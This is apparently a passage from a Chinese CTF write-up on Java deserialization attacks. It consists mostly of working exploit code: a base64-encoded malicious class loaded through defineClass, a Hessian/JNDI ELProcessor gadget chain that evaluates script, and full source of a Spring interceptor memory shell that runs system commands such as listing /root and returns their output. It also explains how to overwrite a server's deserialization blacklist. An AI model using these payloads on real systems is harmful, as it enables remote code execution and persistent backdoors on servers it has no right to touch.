3RnQVVzUUFDQUNrQU1RQTBBRFVBUUFCSkFFd0FPZ0FFQUVjQUFBQk9BQk1BQUFBbkFBUUFLUUFNQUNvQUd3QXJBQ2NBTEFBcEFDNEFNUUF4QURRQUx3QTFBREFBT1FBeUFENEFNd0JBQURVQVNRQTRBRXdBTmdCT0FEY0FVd0E1QUZ3QU9nQmxBRHNBYlFBOEFFZ0FBQUJJQUFjQU5RQUVBSUVBZ2dBREFFNEFCUUNCQUlNQUJBQWJBRklBaEFDRkFBQUFKd0JHQUlZQWh3QUJBQ2tBUkFDSUFJa0FBZ0JBQUMwQWlnQ0xBQU1BWEFBUkFJd0FTZ0FFQUkwQUFBQU1BQUVBUUFBdEFJb0FqZ0FEQUZRQUFBQXRBQVQvQURRQUF3Y0Fqd2NBa0FjQWtRQUJCd0NTQlA4QUVnQUVCd0NQQndDUUJ3Q1JCd0NUQUFFSEFKUUdBQUlBbFFBQUFBSUFsZ0VQQUFBQUNnQUJBTGdBdEFFT0FBbHdkQUFGVUhWd2FURndkd0VBZUhoMEFBSjZXbk55QURGamIyMHVjM1Z1TG05eVp5NWhjR0ZqYUdVdWVIQmhkR2d1YVc1MFpYSnVZV3d1YjJKcVpXTjBjeTVZVTNSeWFXNW5IQW9uTzBnV3hmMENBQUI0Y2dBeFkyOXRMbk4xYmk1dmNtY3VZWEJoWTJobExuaHdZWFJvTG1sdWRHVnlibUZzTG05aWFtVmpkSE11V0U5aWFtVmpkUFNZRWdtN2U3WVpBZ0FCVEFBRmJWOXZZbXAwQUJKTWFtRjJZUzlzWVc1bkwwOWlhbVZqZER0NGNnQXNZMjl0TG5OMWJpNXZjbWN1WVhCaFkyaGxMbmh3WVhSb0xtbHVkR1Z5Ym1Gc0xrVjRjSEpsYzNOcGIyNEgyYVljamF5czFnSUFBVXdBQ0cxZmNHRnlaVzUwZEFBeVRHTnZiUzl6ZFc0dmIzSm5MMkZ3WVdOb1pTOTRjR0YwYUM5cGJuUmxjbTVoYkM5RmVIQnlaWE56YVc5dVRtOWtaVHQ0Y0hCeEFINEFFWGh4QUg0QUFuTnhBSDRBQUQ5QUFBQUFBQUFNZHdnQUFBQVFBQUFBQW5FQWZnQURjUUIrQUJoeEFINEFFbkVBZmdBR2VIRUFmZ0FaZUE9PSJ9AQCjeyJjb2RlIjoiMjAwIiwibWVzc2FnZSI6InJPMEFCWE55QUJOcVlYWmhMblYwYVd3dVFYSnlZWGxNYVhOMGVJSFNIWm5IWVowREFBRkpBQVJ6YVhwbGVIQUFBQUFCZHdRQUFBQUJkQUFwYjNKbkxtcGliM056TG5CeWIzaDVMbVZxWWk1b1lXNWtiR1V1U0c5dFpVaGhibVJzWlVsdGNHeDQifQEAEi9ibGFja2xpc3QvamRrL2dldAcAugwA1gDXDAA5ANUBAAxDb250ZW50LVR5cGUBAB5hcHBsaWNhdGlvbi9qc29uO2NoYXJzZXQ9VVRGLTgHALwMANgA2QwA2gDbBwDcDADdANUMAN4AOgwA3wA6DABaAFsMAF4AXwEABnN0YWFydAcA4AwA4QDiAQA5b3JnLnNwcmluZ2ZyYW1ld29yay53ZWIuc2VydmxldC5EaXNwYXRjaGVyU2VydmxldC5DT05URVhUBwDjDADkAOUBADVvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L1dlYkFwcGxpY2F0aW9uQ29udGV4dAEAUm9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9hbm5vdGF0aW9uL1JlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmcMAOYA5wEAPm9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvaGFuZGxlci9BYnN0cmFjdEhhbmRsZXJNYXBwaW5nAQATYWRhcHRlZEludGVyY2VwdG9ycwcA6AwA6QDqAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDADrADoHAL4MAOwA7QwA7gDvAQAOamF2YS91dGlsL0xpc3QBACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgEAImNvbS9qYXZhL3BheWxvYWRzL21hZ2ljSW50ZXJjZXB0b3IMAPAA1wEAAm9rAQAQamF2YS9sYW5nL09iamVjdAEAMm9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvSGFuZGxlckludGVyY2VwdG9yAQATamF2YS9pby9JbnB1dFN0cmVhbQEAEGphdmEvbGFuZy9TdHJpbmcBACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0AQAmamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2UBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABBqYXZhL2xhbmcvU3lzdGVtAQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BAAQoSSlWAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwEAB2hhc05leHQBAAMoKVoBAARuZXh0AQAUKClMamF2YS9sYW5nL1N0cmluZzsBAA1nZXRSZXF1ZXN0VVJJAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAJYWRkSGVhZGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvU3RyaW5nOylWAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsBABNqYXZhL2lvL1ByaW50V3JpdGVyAQAFd3JpdGUBAAVmbHVzaAEABWNsb3NlAQA8b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RDb250ZXh0SG9sZGVyAQAYY3VycmVudFJlcXVlc3RBdHRyaWJ1dGVzAQA9KClMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RBdHRyaWJ1dGVzOwEAOW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0QXR0cmlidXRlcwEADGdldEF0dHJpYnV0ZQEAJyhMamF2YS9sYW5nL1N0cmluZztJKUxqYXZhL2xhbmcvT2JqZWN0OwEAB2dldEJlYW4BACUoTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9PYmplY3Q7AQAPamF2YS9sYW5nL0NsYXNzAQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAD3ByaW50U3RhY2tUcmFjZQEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAANhZGQAIQAxADUAAQA2AAEACQA3ADgAAAAFAAEAOQA6AAEAOwAAAC8AAQABAAAABSq3AAGxAAAAAgA8AAAABgABAAAAGwA9AAAADAABAAAABQA+AD8AAAABAEAAQQACADsAAAGvAAMACQAAAK2yAAKyAAO2AAS4AAUSBrYAB7YACDoFuwAJWRkFtwAKEgu2AAw6BhkGtgANmQALGQa2AA6nAAUSDzoHsgACK7kAEAEAtgARsgADBXCaAAoSEjoEpwAHEhM6BCu5ABABABIUtgAVmQBHuwAJWRkEtwAWEgu2AAy2AA46CCwSFxIYuQAZAwAsuQAaAQAZCLYAGyy5ABoBALYAHCy5ABoBALYAHbIAAwRgswADA6wErAAAAAMAPAAAAEYAEQAAADkACQA6ABYAOwAmADwAOgA9AEYAPwBOAEAAVQBDAFkARgBnAEcAegBLAIQATACPAE0AmABOAKEATwCpAFAAqwBlAD0AAABmAAoAUgADAEIAQwAEAHoAMQBEAEMACAAAAK0APgA/AAAAAACtAEUARgABAAAArQBHAEgAAgAAAK0ASQBKAAMAWQBUAEIAQwAEABYAlwBLAEwABQAmAIcATQBOAAYAOgBzAE8AQwAHAFAAAAA4AAX+ADYABwBRBwBSQQcAU/wAHAcAU/8AAwAIBwBUBwBVBwBWBwBXBwBTBwBRBwBSBwBTAAD7AFEAWAAAAAQAAQBZAAEAWgBbAAIAOwAAAGAABQAFAAAACiorLC0ZBLcAHrEAAAACADwAAAAKAAIAAABqAAkAawA9AAAANAAFAAAACgA+AD8AAAAAAAoARQBGAAEAAAAKAEcASAACAAAACgBJAEoAAwAAAAoAXABdAAQAWAAAAAQAAQBZAAEAXgBfAAIAOwAAAGAABQAFAAAACiorLC0ZBLcAH7EAAAACADwAAAAKAAIAAABvAAkAcAA9AAAANAAFAAAACgA+AD8AAAAAAAoARQBGAAEAAAAKAEcASAACAAAACgBJAEoAAwAAAAoAYABhAAQAWAAAAAQAAQBZAAgAYgA6AAEAOwAAAXEAAwAFAAAAbgSzAAOyAAISILYAEbgAIRIiA7kAIwMAwAAkSyoSJbkAJgIAwAAlTAFNEicSKLYAKU2nAAhOLbYAKywEtgAsAU4sK7YALcAALk6nAAo6BBkEtgAwuwAxWbcAMjoELRkEuQAzAgBXsgACEjS2ABGxAAIAKQAxADQAKgBAAEkATAAvAAQAPAAAAE4AEwAAAB0ABAAfAAwAIAAbACEAJwAiACkAJAAxACcANAAlADUAJgA5ACgAPgApAEAAKwBJAC4ATAAsAE4ALQBTAC8AXAAwAGUAMQBtADIAPQAAAEgABwA1AAQAYwBkAAMATgAFAGMAZQAEABsAUgBmAGcAAAAnAEYAaABpAAEAKQBEAGoAawACAEAALQBsAG0AAwBcABEAbgA/AAQAbwAAAAwAAQBAAC0AbABwAAMAUAAAAC0ABP8ANAADBwBxBwByBwBzAAEHAHQE/wASAAQHAHEHAHIHAHMHAHUAAQcAdgYAAQB3AAAAAgB4';var Thread = Java.type('java.lang.Thread');var tt=Thread.currentThread().getContextClassLoader();var b64 = Java.type('sun.misc.BASE64Decoder');var b=new b64().decodeBuffer(str);var byteArray = Java.type('byte[]');var int = Java.type('int');var defineClassMethod = java.lang.ClassLoader.class.getDeclaredMethod('defineClass',byteArray.class,int.class,int.class);defineClassMethod.setAccessible(true);var cc = defineClassMethod.invoke(tt,b,0,b.length);cc.newInstance();";
        ResourceRef resourceRef = new ResourceRef("javax.el.ELProcessor", (String)null, "", "", true, "org.apache.naming.factory.BeanFactory", (String)null);
        resourceRef.add(new StringRefAddr("forceString", "pupi1=eval"));
        resourceRef.add(new StringRefAddr("pupi1", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(\""+ x +"\")"));
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(resourceRef);

        Class<?> ccCl = Class.forName("javax.naming.spi.ContinuationDirContext"); //$NON-NLS-1$
        Constructor<?> ccCons = ccCl.getDeclaredConstructor(CannotProceedException.class, Hashtable.class);
        ccCons.setAccessible(true);
        CannotProceedException cpe = new CannotProceedException();
        ReflectionHelper.setFieldValue(cpe, "cause", null);
        ReflectionHelper.setFieldValue(cpe, "stackTrace", null);

        cpe.setResolvedObj(resourceRef);

        ReflectionHelper.setFieldValue(cpe, "suppressedExceptions", null);
        DirContext ctx = (DirContext) ccCons.newInstance(cpe, new Hashtable<>());


        JSONObject jsonObject = new JSONObject();
        jsonObject.put("Pupi1",ctx);


        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        Hessian2Output hout = new Hessian2Output(bout);
        hout.setSerializerFactory(serializerFactory);
        hout.getSerializerFactory().setAllowNonSerializable(true);
        hout.writeString("C");
        //hout.writeObjectBegin("Object");
        //hout.writeString("2.2");
        hout.writeObject(jsonObject);


        hout.close();
        String ret = Base64.getEncoder().encodeToString(bout.toByteArray());
        System.out.println(ret);

然后就可以控制页面的返回值了。server的原生反序列化的黑名单是可以被覆盖的,所以我们先更新原生的黑名单把TemplatesImpl放出来。然后就可以直接打fastjson的原生反序列化了,同样因为不出网所以我们也得加载内存马

register的内存马:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
public class magicInterceptor implements HandlerInterceptor {

    public  static int nums = 1;
    static {
        System.out.println("OKOK");
        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
        RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
        Field field = null;
        try {
            field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
        } catch (NoSuchFieldException e) {
            e.printStackTrace();
        }
        field.setAccessible(true);
        List<HandlerInterceptor> adaptInterceptors = null;
        try {
            adaptInterceptors = (List<HandlerInterceptor>) field.get(mappingHandlerMapping);
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        }
        magicInterceptor evilInterceptor = new magicInterceptor();
        adaptInterceptors.add(evilInterceptor);
        System.out.println("ok");
    }

    @Override
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
//        String code1 =
         //        System.out.println(request.getRequestURI());
        String code;
   
        System.out.println(request.getRequestURI());
//        code = "{\"code\":\"200\",\"message\":\""+output+"\"}";
        if(nums % 2 ==0){
            code = "{\"code\":\"200\",\"message\":\"rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAAAIAAAACc3EAfgAAP0AAAAAAAAx3CAAAABAAAAACdAACeXlzcgAfY29tLmFsaWJhYmEuZmFzdGpzb24yLkpTT05BcnJheQAAAAAAAAABAgAAeHIAE2phdmEudXRpbC5BcnJheUxpc3R4gdIdmcdhnQMAAUkABHNpemV4cAAAAAF3BAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA/////3VyAANbW0JL/RkVZ2fbNwIAAHhwAAAAAXVyAAJbQqzzF/gGCFTgAgAAeHAAABoMyv66vgAAADQBMwoAQACXCACYCACZCgCaAJsKAJoAnAoAnQCeCQCfAKAJADwAoQoAogCjCgCkAKUIAKYKAKQApwoAqACpBwCqCgAOAKsIAKwKAA4ArQoADgCuCgAOAK8KAKIAsAcAsQoAFQCXCACyCgAVALMKALQAtQoAtgC3CgC4ALkIALoKABUAuwsAvAC9CAC+CgC2AL8KAA4AwAgAwQgAwgsAwwDECwDDAMUKAMYAxwoAxgDICgDGAMkLAEEAygsAQQDLCADMCgDNAM4IAM8LANAA0QcA0gcA0wsALwDUBwDVCADWCgDXANgHANkKADUA2goA2wDcCgDbAN0HAN4HAN8KADoA2gcA4AoAPACXCwA5AOEIAOIHAOMHAOQBAARudW1zAQABSQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAmTGNvbS9jdGYvZXpzZXIvdXRpbHMvbWFnaWNJbnRlcmNlcHRvcjsBAAxyZXBsYWNlQmxhbmsBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAAXABABlMamF2YS91dGlsL3JlZ2V4L1BhdHRlcm47AQABbQEAGUxqYXZhL3V0aWwvcmVnZXgvTWF0Y2hlcjsBAANzdHIBABJMamF2YS9sYW5nL1N0cmluZzsBAARkZXN0AQANU3RhY2tNYXBUYWJsZQcA5QEACXByZUhhbmRsZQEAZChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7TGphdmEvbGFuZy9PYmplY3Q7KVoBAAZyZXN1bHQBAAdyZXF1ZXN0AQAnTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQAIcmVzcG9uc2UBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAHaGFuZGxlcgEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABGNvZGUBAAJpbgEAFUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAAXMBABNMamF2YS91dGlsL1NjYW5uZXI7AQAGb3V0cHV0BwDmBwCqBwDgBwDnBwDoBwDpAQAKRXhjZXB0aW9ucwcA6gEACnBvc3RIYW5kbGUBAJIoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlO0xqYXZhL2xhbmcvT2JqZWN0O0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L01vZGVsQW5kVmlldzspVgEADG1vZGVsQW5kVmlldwEALkxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L01vZGVsQW5kVmlldzsBAA9hZnRlckNvbXBsZXRpb24BAHkoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlO0xqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvRXhjZXB0aW9uOylWAQACZXgBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7BwDrAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACDxjbGluaXQ+AQABZQEAIExqYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb247AQAiTGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uOwEAB2NvbnRleHQBADdMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9XZWJBcHBsaWNhdGlvbkNvbnRleHQ7AQAVbWFwcGluZ0hhbmRsZXJNYXBwaW5nAQBUTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9hbm5vdGF0aW9uL1JlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmc7AQAFZmllbGQBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQARYWRhcHRJbnRlcmNlcHRvcnMBABBMamF2YS91dGlsL0xpc3Q7AQAPZXZpbEludGVyY2VwdG9yAQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEARkxqYXZhL3V0aWwvTGlzdDxMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9IYW5kbGVySW50ZXJjZXB0b3I7PjsHANIHANMHAOwHANkHAN4HAN8BAApTb3VyY2VGaWxlAQAVbWFnaWNJbnRlcmNlcHRvci5qYXZhDABEAEUBAAABAAlccyp8CXwNfAoHAO0MAO4A7wwA8ADxBwDyDADzAEwHAPQMAPUA9gwAQgBDBwD3DAD4APkHAPoMAPsA/AEADGxzIC1hbCAvcm9vdAwA/QD+BwD/DAEAAQEBABFqYXZhL3V0aWwvU2Nhbm5lcgwARAECAQACXEEMAQMBBAwBBQEGDAEHAQgMAPgBCQEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyAQAZeyJjb2RlIjoiMjAwIiwibWVzc2FnZSI6IgwBCgELBwEMDAENARAHAOUMAREBEgcBEwwBFAEVAQACIn0MARYBCAcA5wwBFwEIAQAHL3N0YXR1cwwBGAEZDABEAQkBAAxDb250ZW50LVR5cGUBAB5hcHBsaWNhdGlvbi9qc29uO2NoYXJzZXQ9VVRGLTgHAOgMARoBGwwBHAEdBwEeDAEfAQkMASAARQwBIQBFDABtAG4MAHEAcgEABnN0YWFydAcBIgwBIwEkAQA5b3JnLnNwcmluZ2ZyYW1ld29yay53ZWIuc2VydmxldC5EaXNwYXRjaGVyU2VydmxldC5DT05URVhUBwElDAEmAScBADVvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L1dlYkFwcGxpY2F0aW9uQ29udGV4dAEAUm9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9hbm5vdGF0aW9uL1JlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmcMASgBKQEAPm9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvaGFuZGxlci9BYnN0cmFjdEhhbmRsZXJNYXBwaW5nAQATYWRhcHRlZEludGVyY2VwdG9ycwcBKgwBKwEsAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDAEtAEUHAOwMAS4BLwwBMAExAQAOamF2YS91dGlsL0xpc3QBACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgEAJGNvbS9jdGYvZXpzZXIvdXRpbHMvbWFnaWNJbnRlcmNlcHRvcgwBMgEZAQACb2sBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQAyb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9IYW5kbGVySW50ZXJjZXB0b3IBABBqYXZhL2xhbmcvU3RyaW5nAQATamF2YS9pby9JbnB1dFN0cmVhbQEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAEGphdmEvbGFuZy9PYmplY3QBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABdqYXZhL3V0aWwvcmVnZXgvUGF0dGVybgEAB2NvbXBpbGUBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvcmVnZXgvUGF0dGVybjsBAAdtYXRjaGVyAQAzKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylMamF2YS91dGlsL3JlZ2V4L01hdGNoZXI7AQAXamF2YS91dGlsL3JlZ2V4L01hdGNoZXIBAApyZXBsYWNlQWxsAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAEKEkpVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAAdoYXNOZXh0AQADKClaAQAEbmV4dAEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAQamF2YS91dGlsL0Jhc2U2NAEACmdldEVuY29kZXIBAAdFbmNvZGVyAQAMSW5uZXJDbGFzc2VzAQAcKClMamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyOwEACGdldEJ5dGVzAQAEKClbQgEAGGphdmEvdXRpbC9CYXNlNjQkRW5jb2RlcgEADmVuY29kZVRvU3RyaW5nAQAWKFtCKUxqYXZhL2xhbmcvU3RyaW5nOwEACHRvU3RyaW5nAQANZ2V0UmVxdWVzdFVSSQEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWgEACWFkZEhlYWRlcgEAJyhMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL1N0cmluZzspVgEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQATamF2YS9pby9QcmludFdyaXRlcgEABXdyaXRlAQAFZmx1c2gBAAVjbG9zZQEAPG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0Q29udGV4dEhvbGRlcgEAGGN1cnJlbnRSZXF1ZXN0QXR0cmlidXRlcwEAPSgpTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0QXR0cmlidXRlczsBADlvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdEF0dHJpYnV0ZXMBAAxnZXRBdHRyaWJ1dGUBACcoTGphdmEvbGFuZy9TdHJpbmc7SSlMamF2YS9sYW5nL09iamVjdDsBAAdnZXRCZWFuAQAlKExqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvT2JqZWN0OwEAD2phdmEvbGFuZy9DbGFzcwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA9wcmludFN0YWNrVHJhY2UBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQADYWRkACEAPABAAAEAQQABAAkAQgBDAAAACAABAEQARQABAEYAAAAvAAEAAQAAAAUqtwABsQAAAAIARwAAAAYAAQAAACUASAAAAAwAAQAAAAUASQBKAAAACQBLAEwAAQBGAAAAhgACAAQAAAAcEgJMKsYAFhIDuAAETSwqtgAFTi0SArYABkwrsAAAAAMARwAAABoABgAAAD8AAwBBAAcAQwANAEUAEwBHABoASwBIAAAAKgAEAA0ADQBNAE4AAgATAAcATwBQAAMAAAAcAFEAUgAAAAMAGQBTAFIAAQBUAAAACAAB/AAaBwBVAAEAVgBXAAIARgAAAaEAAwAJAAAAurIAB7IACLYACbgAChILtgAMtgANOgW7AA5ZGQW3AA8SELYAEToGGQa2ABKZAAsZBrYAE6cABRICOgeyAAcZB7YAFLsAFVm3ABYSF7YAGLgAGRkHtgAatgAbtgAYEhy2ABi2AB06BCu5AB4BABIftgAgmQBHuwAOWRkEtwAhEhC2ABG2ABM6CCwSIhIjuQAkAwAsuQAlAQAZCLYAJiy5ACUBALYAJyy5ACUBALYAKLIACARgswAIA6wErAAAAAMARwAAAD4ADwAAAFQACQBYABYAWQAmAFoAOgBiAEIAZQBmAG0AdABuAIcAcgCRAHMAnAB0AKUAdQCuAHYAtgB3ALgAjABIAAAAXAAJAIcAMQBYAFIACAAAALoASQBKAAAAAAC6AFkAWgABAAAAugBbAFwAAgAAALoAXQBeAAMAZgBUAF8AUgAEABYApABgAGEABQAmAJQAYgBjAAYAOgCAAGQAUgAHAFQAAAAv